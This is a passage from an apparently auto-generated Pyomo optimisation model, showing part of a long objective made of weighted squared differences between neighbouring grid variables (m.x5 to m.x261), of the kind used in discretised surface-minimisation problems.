m.x5)**2 + (1.3*m.x6 - 1.3*m.x5)**2) + 3.98750108076342*((8.11690209768664*m.x33 -
8.11690209768664*m.x6)**2 + (1.3*m.x7 - 1.3*m.x6)**2) + 3.98750108076342*((8.11690209768664*m.x34
- 8.11690209768664*m.x7)**2 + (1.3*m.x8 - 1.3*m.x7)**2) + 3.98750108076342*((8.11690209768664*
m.x35 - 8.11690209768664*m.x8)**2 + (1.3*m.x9 - 1.3*m.x8)**2) + 3.98750108076342*((
8.11690209768664*m.x36 - 8.11690209768664*m.x9)**2 + (1.3*m.x10 - 1.3*m.x9)**2) +
3.98750108076342*((8.11690209768664*m.x37 - 8.11690209768664*m.x10)**2 + (1.3*m.x11 - 1.3*m.x10)
**2) + 3.98750108076342*((8.11690209768664*m.x38 - 8.11690209768664*m.x11)**2 + (1.3*m.x12 - 1.3*
m.x11)**2) + 3.98750108076342*((8.11690209768664*m.x39 - 8.11690209768664*m.x12)**2 + (1.3*m.x13
- 1.3*m.x12)**2) + 3.98750108076342*((8.11690209768664*m.x40 - 8.11690209768664*m.x13)**2 + (1.3
*m.x14 - 1.3*m.x13)**2) + 3.98750108076342*((8.11690209768664*m.x41 - 8.11690209768664*m.x14)**2
+ (1.3*m.x15 - 1.3*m.x14)**2) + 3.98750108076342*((8.11690209768664*m.x42 - 8.11690209768664*
m.x15)**2 + (1.3*m.x16 - 1.3*m.x15)**2) + 3.98750108076342*((8.11690209768664*m.x43 -
8.11690209768664*m.x16)**2 + (1.3*m.x17 - 1.3*m.x16)**2) + 3.98750108076342*((8.11690209768664*
m.x44 - 8.11690209768664*m.x17)**2 + (1.3*m.x18 - 1.3*m.x17)**2) + 3.98750108076342*((
8.11690209768664*m.x45 - 8.11690209768664*m.x18)**2 + (1.3*m.x19 - 1.3*m.x18)**2) +
3.98750108076342*((8.11690209768664*m.x46 - 8.11690209768664*m.x19)**2 + (1.3*m.x20 - 1.3*m.x19)
**2) + 3.98750108076342*((8.11690209768664*m.x47 - 8.11690209768664*m.x20)**2 + (1.3*m.x21 - 1.3*
m.x20)**2) + 3.98750108076342*((8.11690209768664*m.x48 - 8.11690209768664*m.x21)**2 + (1.3*m.x22
- 1.3*m.x21)**2) + 3.98750108076342*((8.11690209768664*m.x49 - 8.11690209768664*m.x22)**2 + (1.3
*m.x23 - 1.3*m.x22)**2) + 3.98750108076342*((8.11690209768664*m.x50 - 8.11690209768664*m.x23)**2
+ (1.3*m.x24 - 1.3*m.x23)**2) + 3.98750108076342*((8.11690209768664*m.x51 - 8.11690209768664*
m.x24)**2 + (1.3*m.x25 - 1.3*m.x24)**2) + 3.98750108076342*((8.11690209768664*m.x52 -
8.11690209768664*m.x25)**2 + (1.3*m.x26 - 1.3*m.x25)**2) + 3.98750108076342*((8.11690209768664*
m.x53 - 8.11690209768664*m.x26)**2 + (1.3*m.x27 - 1.3*m.x26)**2) + 3.96838326769395*((
8.11690209768664*m.x55 - 8.11690209768664*m.x28)**2 + (1.3*m.x29 - 1.3*m.x28)**2) +
3.96838326769395*((8.11690209768664*m.x56 - 8.11690209768664*m.x29)**2 + (1.3*m.x30 - 1.3*m.x29)
**2) + 3.96838326769395*((8.11690209768664*m.x57 - 8.11690209768664*m.x30)**2 + (1.3*m.x31 - 1.3*
m.x30)**2) + 3.96838326769395*((8.11690209768664*m.x58 - 8.11690209768664*m.x31)**2 + (1.3*m.x32
- 1.3*m.x31)**2) + 3.96838326769395*((8.11690209768664*m.x59 - 8.11690209768664*m.x32)**2 + (1.3
*m.x33 - 1.3*m.x32)**2) + 3.96838326769395*((8.11690209768664*m.x60 - 8.11690209768664*m.x33)**2
+ (1.3*m.x34 - 1.3*m.x33)**2) + 3.96838326769395*((8.11690209768664*m.x61 - 8.11690209768664*
m.x34)**2 + (1.3*m.x35 - 1.3*m.x34)**2) + 3.96838326769395*((8.11690209768664*m.x62 -
8.11690209768664*m.x35)**2 + (1.3*m.x36 - 1.3*m.x35)**2) + 3.96838326769395*((8.11690209768664*
m.x63 - 8.11690209768664*m.x36)**2 + (1.3*m.x37 - 1.3*m.x36)**2) + 3.96838326769395*((
8.11690209768664*m.x64 - 8.11690209768664*m.x37)**2 + (1.3*m.x38 - 1.3*m.x37)**2) +
3.96838326769395*((8.11690209768664*m.x65 - 8.11690209768664*m.x38)**2 + (1.3*m.x39 - 1.3*m.x38)
**2) + 3.96838326769395*((8.11690209768664*m.x66 - 8.11690209768664*m.x39)**2 + (1.3*m.x40 - 1.3*
m.x39)**2) + 3.96838326769395*((8.11690209768664*m.x67 - 8.11690209768664*m.x40)**2 + (1.3*m.x41
- 1.3*m.x40)**2) + 3.96838326769395*((8.11690209768664*m.x68 - 8.11690209768664*m.x41)**2 + (1.3
*m.x42 - 1.3*m.x41)**2) + 3.96838326769395*((8.11690209768664*m.x69 - 8.11690209768664*m.x42)**2
+ (1.3*m.x43 - 1.3*m.x42)**2) + 3.96838326769395*((8.11690209768664*m.x70 - 8.11690209768664*
m.x43)**2 + (1.3*m.x44 - 1.3*m.x43)**2) + 3.96838326769395*((8.11690209768664*m.x71 -
8.11690209768664*m.x44)**2 + (1.3*m.x45 - 1.3*m.x44)**2) + 3.96838326769395*((8.11690209768664*
m.x72 - 8.11690209768664*m.x45)**2 + (1.3*m.x46 - 1.3*m.x45)**2) + 3.96838326769395*((
8.11690209768664*m.x73 - 8.11690209768664*m.x46)**2 + (1.3*m.x47 - 1.3*m.x46)**2) +
3.96838326769395*((8.11690209768664*m.x74 - 8.11690209768664*m.x47)**2 + (1.3*m.x48 - 1.3*m.x47)
**2) + 3.96838326769395*((8.11690209768664*m.x75 - 8.11690209768664*m.x48)**2 + (1.3*m.x49 - 1.3*
m.x48)**2) + 3.96838326769395*((8.11690209768664*m.x76 - 8.11690209768664*m.x49)**2 + (1.3*m.x50
- 1.3*m.x49)**2) + 3.96838326769395*((8.11690209768664*m.x77 - 8.11690209768664*m.x50)**2 + (1.3
*m.x51 - 1.3*m.x50)**2) + 3.96838326769395*((8.11690209768664*m.x78 - 8.11690209768664*m.x51)**2
+ (1.3*m.x52 - 1.3*m.x51)**2) + 3.96838326769395*((8.11690209768664*m.x79 - 8.11690209768664*
m.x52)**2 + (1.3*m.x53 - 1.3*m.x52)**2) + 3.96838326769395*((8.11690209768664*m.x80 -
8.11690209768664*m.x53)**2 + (1.3*m.x54 - 1.3*m.x53)**2) + 3.93334154633735*((8.11690209768664*
m.x82 - 8.11690209768664*m.x55)**2 + (1.3*m.x56 - 1.3*m.x55)**2) + 3.93334154633735*((
8.11690209768664*m.x83 - 8.11690209768664*m.x56)**2 + (1.3*m.x57 - 1.3*m.x56)**2) +
3.93334154633735*((8.11690209768664*m.x84 - 8.11690209768664*m.x57)**2 + (1.3*m.x58 - 1.3*m.x57)
**2) + 3.93334154633735*((8.11690209768664*m.x85 - 8.11690209768664*m.x58)**2 + (1.3*m.x59 - 1.3*
m.x58)**2) + 3.93334154633735*((8.11690209768664*m.x86 - 8.11690209768664*m.x59)**2 + (1.3*m.x60
- 1.3*m.x59)**2) + 3.93334154633735*((8.11690209768664*m.x87 - 8.11690209768664*m.x60)**2 + (1.3
*m.x61 - 1.3*m.x60)**2) + 3.93334154633735*((8.11690209768664*m.x88 - 8.11690209768664*m.x61)**2
+ (1.3*m.x62 - 1.3*m.x61)**2) + 3.93334154633735*((8.11690209768664*m.x89 - 8.11690209768664*
m.x62)**2 + (1.3*m.x63 - 1.3*m.x62)**2) + 3.93334154633735*((8.11690209768664*m.x90 -
8.11690209768664*m.x63)**2 + (1.3*m.x64 - 1.3*m.x63)**2) + 3.93334154633735*((8.11690209768664*
m.x91 - 8.11690209768664*m.x64)**2 + (1.3*m.x65 - 1.3*m.x64)**2) + 3.93334154633735*((
8.11690209768664*m.x92 - 8.11690209768664*m.x65)**2 + (1.3*m.x66 - 1.3*m.x65)**2) +
3.93334154633735*((8.11690209768664*m.x93 - 8.11690209768664*m.x66)**2 + (1.3*m.x67 - 1.3*m.x66)
**2) + 3.93334154633735*((8.11690209768664*m.x94 - 8.11690209768664*m.x67)**2 + (1.3*m.x68 - 1.3*
m.x67)**2) + 3.93334154633735*((8.11690209768664*m.x95 - 8.11690209768664*m.x68)**2 + (1.3*m.x69
- 1.3*m.x68)**2) + 3.93334154633735*((8.11690209768664*m.x96 - 8.11690209768664*m.x69)**2 + (1.3
*m.x70 - 1.3*m.x69)**2) + 3.93334154633735*((8.11690209768664*m.x97 - 8.11690209768664*m.x70)**2
+ (1.3*m.x71 - 1.3*m.x70)**2) + 3.93334154633735*((8.11690209768664*m.x98 - 8.11690209768664*
m.x71)**2 + (1.3*m.x72 - 1.3*m.x71)**2) + 3.93334154633735*((8.11690209768664*m.x99 -
8.11690209768664*m.x72)**2 + (1.3*m.x73 - 1.3*m.x72)**2) + 3.93334154633735*((8.11690209768664*
m.x100 - 8.11690209768664*m.x73)**2 + (1.3*m.x74 - 1.3*m.x73)**2) + 3.93334154633735*((
8.11690209768664*m.x101 - 8.11690209768664*m.x74)**2 + (1.3*m.x75 - 1.3*m.x74)**2) +
3.93334154633735*((8.11690209768664*m.x102 - 8.11690209768664*m.x75)**2 + (1.3*m.x76 - 1.3*m.x75)
**2) + 3.93334154633735*((8.11690209768664*m.x103 - 8.11690209768664*m.x76)**2 + (1.3*m.x77 - 1.3
*m.x76)**2) + 3.93334154633735*((8.11690209768664*m.x104 - 8.11690209768664*m.x77)**2 + (1.3*
m.x78 - 1.3*m.x77)**2) + 3.93334154633735*((8.11690209768664*m.x105 - 8.11690209768664*m.x78)**2
+ (1.3*m.x79 - 1.3*m.x78)**2) + 3.93334154633735*((8.11690209768664*m.x106 - 8.11690209768664*
m.x79)**2 + (1.3*m.x80 - 1.3*m.x79)**2) + 3.93334154633735*((8.11690209768664*m.x107 -
8.11690209768664*m.x80)**2 + (1.3*m.x81 - 1.3*m.x80)**2) + 3.88318350957206*((8.11690209768664*
m.x109 - 8.11690209768664*m.x82)**2 + (1.3*m.x83 - 1.3*m.x82)**2) + 3.88318350957206*((
8.11690209768664*m.x110 - 8.11690209768664*m.x83)**2 + (1.3*m.x84 - 1.3*m.x83)**2) +
3.88318350957206*((8.11690209768664*m.x111 - 8.11690209768664*m.x84)**2 + (1.3*m.x85 - 1.3*m.x84)
**2) + 3.88318350957206*((8.11690209768664*m.x112 - 8.11690209768664*m.x85)**2 + (1.3*m.x86 - 1.3
*m.x85)**2) + 3.88318350957206*((8.11690209768664*m.x113 - 8.11690209768664*m.x86)**2 + (1.3*
m.x87 - 1.3*m.x86)**2) + 3.88318350957206*((8.11690209768664*m.x114 - 8.11690209768664*m.x87)**2
+ (1.3*m.x88 - 1.3*m.x87)**2) + 3.88318350957206*((8.11690209768664*m.x115 - 8.11690209768664*
m.x88)**2 + (1.3*m.x89 - 1.3*m.x88)**2) + 3.88318350957206*((8.11690209768664*m.x116 -
8.11690209768664*m.x89)**2 + (1.3*m.x90 - 1.3*m.x89)**2) + 3.88318350957206*((8.11690209768664*
m.x117 - 8.11690209768664*m.x90)**2 + (1.3*m.x91 - 1.3*m.x90)**2) + 3.88318350957206*((
8.11690209768664*m.x118 - 8.11690209768664*m.x91)**2 + (1.3*m.x92 - 1.3*m.x91)**2) +
3.88318350957206*((8.11690209768664*m.x119 - 8.11690209768664*m.x92)**2 + (1.3*m.x93 - 1.3*m.x92)
**2) + 3.88318350957206*((8.11690209768664*m.x120 - 8.11690209768664*m.x93)**2 + (1.3*m.x94 - 1.3
*m.x93)**2) + 3.88318350957206*((8.11690209768664*m.x121 - 8.11690209768664*m.x94)**2 + (1.3*
m.x95 - 1.3*m.x94)**2) + 3.88318350957206*((8.11690209768664*m.x122 - 8.11690209768664*m.x95)**2
+ (1.3*m.x96 - 1.3*m.x95)**2) + 3.88318350957206*((8.11690209768664*m.x123 - 8.11690209768664*
m.x96)**2 + (1.3*m.x97 - 1.3*m.x96)**2) + 3.88318350957206*((8.11690209768664*m.x124 -
8.11690209768664*m.x97)**2 + (1.3*m.x98 - 1.3*m.x97)**2) + 3.88318350957206*((8.11690209768664*
m.x125 - 8.11690209768664*m.x98)**2 + (1.3*m.x99 - 1.3*m.x98)**2) + 3.88318350957206*((
8.11690209768664*m.x126 - 8.11690209768664*m.x99)**2 + (1.3*m.x100 - 1.3*m.x99)**2) +
3.88318350957206*((8.11690209768664*m.x127 - 8.11690209768664*m.x100)**2 + (1.3*m.x101 - 1.3*
m.x100)**2) + 3.88318350957206*((8.11690209768664*m.x128 - 8.11690209768664*m.x101)**2 + (1.3*
m.x102 - 1.3*m.x101)**2) + 3.88318350957206*((8.11690209768664*m.x129 - 8.11690209768664*m.x102)
**2 + (1.3*m.x103 - 1.3*m.x102)**2) + 3.88318350957206*((8.11690209768664*m.x130 -
8.11690209768664*m.x103)**2 + (1.3*m.x104 - 1.3*m.x103)**2) + 3.88318350957206*((8.11690209768664
*m.x131 - 8.11690209768664*m.x104)**2 + (1.3*m.x105 - 1.3*m.x104)**2) + 3.88318350957206*((
8.11690209768664*m.x132 - 8.11690209768664*m.x105)**2 + (1.3*m.x106 - 1.3*m.x105)**2) +
3.88318350957206*((8.11690209768664*m.x133 - 8.11690209768664*m.x106)**2 + (1.3*m.x107 - 1.3*
m.x106)**2) + 3.88318350957206*((8.11690209768664*m.x134 - 8.11690209768664*m.x107)**2 + (1.3*
m.x108 - 1.3*m.x107)**2) + 3.81904921438734*((8.11690209768664*m.x136 - 8.11690209768664*m.x109)
**2 + (1.3*m.x110 - 1.3*m.x109)**2) + 3.81904921438734*((8.11690209768664*m.x137 -
8.11690209768664*m.x110)**2 + (1.3*m.x111 - 1.3*m.x110)**2) + 3.81904921438734*((8.11690209768664
*m.x138 - 8.11690209768664*m.x111)**2 + (1.3*m.x112 - 1.3*m.x111)**2) + 3.81904921438734*((
8.11690209768664*m.x139 - 8.11690209768664*m.x112)**2 + (1.3*m.x113 - 1.3*m.x112)**2) +
3.81904921438734*((8.11690209768664*m.x140 - 8.11690209768664*m.x113)**2 + (1.3*m.x114 - 1.3*
m.x113)**2) + 3.81904921438734*((8.11690209768664*m.x141 - 8.11690209768664*m.x114)**2 + (1.3*
m.x115 - 1.3*m.x114)**2) + 3.81904921438734*((8.11690209768664*m.x142 - 8.11690209768664*m.x115)
**2 + (1.3*m.x116 - 1.3*m.x115)**2) + 3.81904921438734*((8.11690209768664*m.x143 -
8.11690209768664*m.x116)**2 + (1.3*m.x117 - 1.3*m.x116)**2) + 3.81904921438734*((8.11690209768664
*m.x144 - 8.11690209768664*m.x117)**2 + (1.3*m.x118 - 1.3*m.x117)**2) + 3.81904921438734*((
8.11690209768664*m.x145 - 8.11690209768664*m.x118)**2 + (1.3*m.x119 - 1.3*m.x118)**2) +
3.81904921438734*((8.11690209768664*m.x146 - 8.11690209768664*m.x119)**2 + (1.3*m.x120 - 1.3*
m.x119)**2) + 3.81904921438734*((8.11690209768664*m.x147 - 8.11690209768664*m.x120)**2 + (1.3*
m.x121 - 1.3*m.x120)**2) + 3.81904921438734*((8.11690209768664*m.x148 - 8.11690209768664*m.x121)
**2 + (1.3*m.x122 - 1.3*m.x121)**2) + 3.81904921438734*((8.11690209768664*m.x149 -
8.11690209768664*m.x122)**2 + (1.3*m.x123 - 1.3*m.x122)**2) + 3.81904921438734*((8.11690209768664
*m.x150 - 8.11690209768664*m.x123)**2 + (1.3*m.x124 - 1.3*m.x123)**2) + 3.81904921438734*((
8.11690209768664*m.x151 - 8.11690209768664*m.x124)**2 + (1.3*m.x125 - 1.3*m.x124)**2) +
3.81904921438734*((8.11690209768664*m.x152 - 8.11690209768664*m.x125)**2 + (1.3*m.x126 - 1.3*
m.x125)**2) + 3.81904921438734*((8.11690209768664*m.x153 - 8.11690209768664*m.x126)**2 + (1.3*
m.x127 - 1.3*m.x126)**2) + 3.81904921438734*((8.11690209768664*m.x154 - 8.11690209768664*m.x127)
**2 + (1.3*m.x128 - 1.3*m.x127)**2) + 3.81904921438734*((8.11690209768664*m.x155 -
8.11690209768664*m.x128)**2 + (1.3*m.x129 - 1.3*m.x128)**2) + 3.81904921438734*((8.11690209768664
*m.x156 - 8.11690209768664*m.x129)**2 + (1.3*m.x130 - 1.3*m.x129)**2) + 3.81904921438734*((
8.11690209768664*m.x157 - 8.11690209768664*m.x130)**2 + (1.3*m.x131 - 1.3*m.x130)**2) +
3.81904921438734*((8.11690209768664*m.x158 - 8.11690209768664*m.x131)**2 + (1.3*m.x132 - 1.3*
m.x131)**2) + 3.81904921438734*((8.11690209768664*m.x159 - 8.11690209768664*m.x132)**2 + (1.3*
m.x133 - 1.3*m.x132)**2) + 3.81904921438734*((8.11690209768664*m.x160 - 8.11690209768664*m.x133)
**2 + (1.3*m.x134 - 1.3*m.x133)**2) + 3.81904921438734*((8.11690209768664*m.x161 -
8.11690209768664*m.x134)**2 + (1.3*m.x135 - 1.3*m.x134)**2) + 3.74236872480975*((8.11690209768664
*m.x163 - 8.11690209768664*m.x136)**2 + (1.3*m.x137 - 1.3*m.x136)**2) + 3.74236872480975*((
8.11690209768664*m.x164 - 8.11690209768664*m.x137)**2 + (1.3*m.x138 - 1.3*m.x137)**2) +
3.74236872480975*((8.11690209768664*m.x165 - 8.11690209768664*m.x138)**2 + (1.3*m.x139 - 1.3*
m.x138)**2) + 3.74236872480975*((8.11690209768664*m.x166 - 8.11690209768664*m.x139)**2 + (1.3*
m.x140 - 1.3*m.x139)**2) + 3.74236872480975*((8.11690209768664*m.x167 - 8.11690209768664*m.x140)
**2 + (1.3*m.x141 - 1.3*m.x140)**2) + 3.74236872480975*((8.11690209768664*m.x168 -
8.11690209768664*m.x141)**2 + (1.3*m.x142 - 1.3*m.x141)**2) + 3.74236872480975*((8.11690209768664
*m.x169 - 8.11690209768664*m.x142)**2 + (1.3*m.x143 - 1.3*m.x142)**2) + 3.74236872480975*((
8.11690209768664*m.x170 - 8.11690209768664*m.x143)**2 + (1.3*m.x144 - 1.3*m.x143)**2) +
3.74236872480975*((8.11690209768664*m.x171 - 8.11690209768664*m.x144)**2 + (1.3*m.x145 - 1.3*
m.x144)**2) + 3.74236872480975*((8.11690209768664*m.x172 - 8.11690209768664*m.x145)**2 + (1.3*
m.x146 - 1.3*m.x145)**2) + 3.74236872480975*((8.11690209768664*m.x173 - 8.11690209768664*m.x146)
**2 + (1.3*m.x147 - 1.3*m.x146)**2) + 3.74236872480975*((8.11690209768664*m.x174 -
8.11690209768664*m.x147)**2 + (1.3*m.x148 - 1.3*m.x147)**2) + 3.74236872480975*((8.11690209768664
*m.x175 - 8.11690209768664*m.x148)**2 + (1.3*m.x149 - 1.3*m.x148)**2) + 3.74236872480975*((
8.11690209768664*m.x176 - 8.11690209768664*m.x149)**2 + (1.3*m.x150 - 1.3*m.x149)**2) +
3.74236872480975*((8.11690209768664*m.x177 - 8.11690209768664*m.x150)**2 + (1.3*m.x151 - 1.3*
m.x150)**2) + 3.74236872480975*((8.11690209768664*m.x178 - 8.11690209768664*m.x151)**2 + (1.3*
m.x152 - 1.3*m.x151)**2) + 3.74236872480975*((8.11690209768664*m.x179 - 8.11690209768664*m.x152)
**2 + (1.3*m.x153 - 1.3*m.x152)**2) + 3.74236872480975*((8.11690209768664*m.x180 -
8.11690209768664*m.x153)**2 + (1.3*m.x154 - 1.3*m.x153)**2) + 3.74236872480975*((8.11690209768664
*m.x181 - 8.11690209768664*m.x154)**2 + (1.3*m.x155 - 1.3*m.x154)**2) + 3.74236872480975*((
8.11690209768664*m.x182 - 8.11690209768664*m.x155)**2 + (1.3*m.x156 - 1.3*m.x155)**2) +
3.74236872480975*((8.11690209768664*m.x183 - 8.11690209768664*m.x156)**2 + (1.3*m.x157 - 1.3*
m.x156)**2) + 3.74236872480975*((8.11690209768664*m.x184 - 8.11690209768664*m.x157)**2 + (1.3*
m.x158 - 1.3*m.x157)**2) + 3.74236872480975*((8.11690209768664*m.x185 - 8.11690209768664*m.x158)
**2 + (1.3*m.x159 - 1.3*m.x158)**2) + 3.74236872480975*((8.11690209768664*m.x186 -
8.11690209768664*m.x159)**2 + (1.3*m.x160 - 1.3*m.x159)**2) + 3.74236872480975*((8.11690209768664
*m.x187 - 8.11690209768664*m.x160)**2 + (1.3*m.x161 - 1.3*m.x160)**2) + 3.74236872480975*((
8.11690209768664*m.x188 - 8.11690209768664*m.x161)**2 + (1.3*m.x162 - 1.3*m.x161)**2) +
3.65481034794559*((8.11690209768664*m.x190 - 8.11690209768664*m.x163)**2 + (1.3*m.x164 - 1.3*
m.x163)**2) + 3.65481034794559*((8.11690209768664*m.x191 - 8.11690209768664*m.x164)**2 + (1.3*
m.x165 - 1.3*m.x164)**2) + 3.65481034794559*((8.11690209768664*m.x192 - 8.11690209768664*m.x165)
**2 + (1.3*m.x166 - 1.3*m.x165)**2) + 3.65481034794559*((8.11690209768664*m.x193 -
8.11690209768664*m.x166)**2 + (1.3*m.x167 - 1.3*m.x166)**2) + 3.65481034794559*((8.11690209768664
*m.x194 - 8.11690209768664*m.x167)**2 + (1.3*m.x168 - 1.3*m.x167)**2) + 3.65481034794559*((
8.11690209768664*m.x195 - 8.11690209768664*m.x168)**2 + (1.3*m.x169 - 1.3*m.x168)**2) +
3.65481034794559*((8.11690209768664*m.x196 - 8.11690209768664*m.x169)**2 + (1.3*m.x170 - 1.3*
m.x169)**2) + 3.65481034794559*((8.11690209768664*m.x197 - 8.11690209768664*m.x170)**2 + (1.3*
m.x171 - 1.3*m.x170)**2) + 3.65481034794559*((8.11690209768664*m.x198 - 8.11690209768664*m.x171)
**2 + (1.3*m.x172 - 1.3*m.x171)**2) + 3.65481034794559*((8.11690209768664*m.x199 -
8.11690209768664*m.x172)**2 + (1.3*m.x173 - 1.3*m.x172)**2) + 3.65481034794559*((8.11690209768664
*m.x200 - 8.11690209768664*m.x173)**2 + (1.3*m.x174 - 1.3*m.x173)**2) + 3.65481034794559*((
8.11690209768664*m.x201 - 8.11690209768664*m.x174)**2 + (1.3*m.x175 - 1.3*m.x174)**2) +
3.65481034794559*((8.11690209768664*m.x202 - 8.11690209768664*m.x175)**2 + (1.3*m.x176 - 1.3*
m.x175)**2) + 3.65481034794559*((8.11690209768664*m.x203 - 8.11690209768664*m.x176)**2 + (1.3*
m.x177 - 1.3*m.x176)**2) + 3.65481034794559*((8.11690209768664*m.x204 - 8.11690209768664*m.x177)
**2 + (1.3*m.x178 - 1.3*m.x177)**2) + 3.65481034794559*((8.11690209768664*m.x205 -
8.11690209768664*m.x178)**2 + (1.3*m.x179 - 1.3*m.x178)**2) + 3.65481034794559*((8.11690209768664
*m.x206 - 8.11690209768664*m.x179)**2 + (1.3*m.x180 - 1.3*m.x179)**2) + 3.65481034794559*((
8.11690209768664*m.x207 - 8.11690209768664*m.x180)**2 + (1.3*m.x181 - 1.3*m.x180)**2) +
3.65481034794559*((8.11690209768664*m.x208 - 8.11690209768664*m.x181)**2 + (1.3*m.x182 - 1.3*
m.x181)**2) + 3.65481034794559*((8.11690209768664*m.x209 - 8.11690209768664*m.x182)**2 + (1.3*
m.x183 - 1.3*m.x182)**2) + 3.65481034794559*((8.11690209768664*m.x210 - 8.11690209768664*m.x183)
**2 + (1.3*m.x184 - 1.3*m.x183)**2) + 3.65481034794559*((8.11690209768664*m.x211 -
8.11690209768664*m.x184)**2 + (1.3*m.x185 - 1.3*m.x184)**2) + 3.65481034794559*((8.11690209768664
*m.x212 - 8.11690209768664*m.x185)**2 + (1.3*m.x186 - 1.3*m.x185)**2) + 3.65481034794559*((
8.11690209768664*m.x213 - 8.11690209768664*m.x186)**2 + (1.3*m.x187 - 1.3*m.x186)**2) +
3.65481034794559*((8.11690209768664*m.x214 - 8.11690209768664*m.x187)**2 + (1.3*m.x188 - 1.3*
m.x187)**2) + 3.65481034794559*((8.11690209768664*m.x215 - 8.11690209768664*m.x188)**2 + (1.3*
m.x189 - 1.3*m.x188)**2) + 3.55822249316643*((8.11690209768664*m.x217 - 8.11690209768664*m.x190)
**2 + (1.3*m.x191 - 1.3*m.x190)**2) + 3.55822249316643*((8.11690209768664*m.x218 -
8.11690209768664*m.x191)**2 + (1.3*m.x192 - 1.3*m.x191)**2) + 3.55822249316643*((8.11690209768664
*m.x219 - 8.11690209768664*m.x192)**2 + (1.3*m.x193 - 1.3*m.x192)**2) + 3.55822249316643*((
8.11690209768664*m.x220 - 8.11690209768664*m.x193)**2 + (1.3*m.x194 - 1.3*m.x193)**2) +
3.55822249316643*((8.11690209768664*m.x221 - 8.11690209768664*m.x194)**2 + (1.3*m.x195 - 1.3*
m.x194)**2) + 3.55822249316643*((8.11690209768664*m.x222 - 8.11690209768664*m.x195)**2 + (1.3*
m.x196 - 1.3*m.x195)**2) + 3.55822249316643*((8.11690209768664*m.x223 - 8.11690209768664*m.x196)
**2 + (1.3*m.x197 - 1.3*m.x196)**2) + 3.55822249316643*((8.11690209768664*m.x224 -
8.11690209768664*m.x197)**2 + (1.3*m.x198 - 1.3*m.x197)**2) + 3.55822249316643*((8.11690209768664
*m.x225 - 8.11690209768664*m.x198)**2 + (1.3*m.x199 - 1.3*m.x198)**2) + 3.55822249316643*((
8.11690209768664*m.x226 - 8.11690209768664*m.x199)**2 + (1.3*m.x200 - 1.3*m.x199)**2) +
3.55822249316643*((8.11690209768664*m.x227 - 8.11690209768664*m.x200)**2 + (1.3*m.x201 - 1.3*
m.x200)**2) + 3.55822249316643*((8.11690209768664*m.x228 - 8.11690209768664*m.x201)**2 + (1.3*
m.x202 - 1.3*m.x201)**2) + 3.55822249316643*((8.11690209768664*m.x229 - 8.11690209768664*m.x202)
**2 + (1.3*m.x203 - 1.3*m.x202)**2) + 3.55822249316643*((8.11690209768664*m.x230 -
8.11690209768664*m.x203)**2 + (1.3*m.x204 - 1.3*m.x203)**2) + 3.55822249316643*((8.11690209768664
*m.x231 - 8.11690209768664*m.x204)**2 + (1.3*m.x205 - 1.3*m.x204)**2) + 3.55822249316643*((
8.11690209768664*m.x232 - 8.11690209768664*m.x205)**2 + (1.3*m.x206 - 1.3*m.x205)**2) +
3.55822249316643*((8.11690209768664*m.x233 - 8.11690209768664*m.x206)**2 + (1.3*m.x207 - 1.3*
m.x206)**2) + 3.55822249316643*((8.11690209768664*m.x234 - 8.11690209768664*m.x207)**2 + (1.3*
m.x208 - 1.3*m.x207)**2) + 3.55822249316643*((8.11690209768664*m.x235 - 8.11690209768664*m.x208)
**2 + (1.3*m.x209 - 1.3*m.x208)**2) + 3.55822249316643*((8.11690209768664*m.x236 -
8.11690209768664*m.x209)**2 + (1.3*m.x210 - 1.3*m.x209)**2) + 3.55822249316643*((8.11690209768664
*m.x237 - 8.11690209768664*m.x210)**2 + (1.3*m.x211 - 1.3*m.x210)**2) + 3.55822249316643*((
8.11690209768664*m.x238 - 8.11690209768664*m.x211)**2 + (1.3*m.x212 - 1.3*m.x211)**2) +
3.55822249316643*((8.11690209768664*m.x239 - 8.11690209768664*m.x212)**2 + (1.3*m.x213 - 1.3*
m.x212)**2) + 3.55822249316643*((8.11690209768664*m.x240 - 8.11690209768664*m.x213)**2 + (1.3*
m.x214 - 1.3*m.x213)**2) + 3.55822249316643*((8.11690209768664*m.x241 - 8.11690209768664*m.x214)
**2 + (1.3*m.x215 - 1.3*m.x214)**2) + 3.55822249316643*((8.11690209768664*m.x242 -
8.11690209768664*m.x215)**2 + (1.3*m.x216 - 1.3*m.x215)**2) + 3.45457232960193*((8.11690209768664
*m.x244 - 8.11690209768664*m.x217)**2 + (1.3*m.x218 - 1.3*m.x217)**2) + 3.45457232960193*((
8.11690209768664*m.x245 - 8.11690209768664*m.x218)**2 + (1.3*m.x219 - 1.3*m.x218)**2) +
3.45457232960193*((8.11690209768664*m.x246 - 8.11690209768664*m.x219)**2 + (1.3*m.x220 - 1.3*
m.x219)**2) + 3.45457232960193*((8.11690209768664*m.x247 - 8.11690209768664*m.x220)**2 + (1.3*
m.x221 - 1.3*m.x220)**2) + 3.45457232960193*((8.11690209768664*m.x248 - 8.11690209768664*m.x221)
**2 + (1.3*m.x222 - 1.3*m.x221)**2) + 3.45457232960193*((8.11690209768664*m.x249 -
8.11690209768664*m.x222)**2 + (1.3*m.x223 - 1.3*m.x222)**2) + 3.45457232960193*((8.11690209768664
*m.x250 - 8.11690209768664*m.x223)**2 + (1.3*m.x224 - 1.3*m.x223)**2) + 3.45457232960193*((
8.11690209768664*m.x251 - 8.11690209768664*m.x224)**2 + (1.3*m.x225 - 1.3*m.x224)**2) +
3.45457232960193*((8.11690209768664*m.x252 - 8.11690209768664*m.x225)**2 + (1.3*m.x226 - 1.3*
m.x225)**2) + 3.45457232960193*((8.11690209768664*m.x253 - 8.11690209768664*m.x226)**2 + (1.3*
m.x227 - 1.3*m.x226)**2) + 3.45457232960193*((8.11690209768664*m.x254 - 8.11690209768664*m.x227)
**2 + (1.3*m.x228 - 1.3*m.x227)**2) + 3.45457232960193*((8.11690209768664*m.x255 -
8.11690209768664*m.x228)**2 + (1.3*m.x229 - 1.3*m.x228)**2) + 3.45457232960193*((8.11690209768664
*m.x256 - 8.11690209768664*m.x229)**2 + (1.3*m.x230 - 1.3*m.x229)**2) + 3.45457232960193*((
8.11690209768664*m.x257 - 8.11690209768664*m.x230)**2 + (1.3*m.x231 - 1.3*m.x230)**2) +
3.45457232960193*((8.11690209768664*m.x258 - 8.11690209768664*m.x231)**2 + (1.3*m.x232 - 1.3*
m.x231)**2) + 3.45457232960193*((8.11690209768664*m.x259 - 8.11690209768664*m.x232)**2 + (1.3*
m.x233 - 1.3*m.x232)**2) + 3.45457232960193*((8.11690209768664*m.x260 - 8.11690209768664*m.x233)
**2 + (1.3*m.x234 - 1.3*m.x233)**2) + 3.45457232960193*((8.11690209768664*m.x261 -
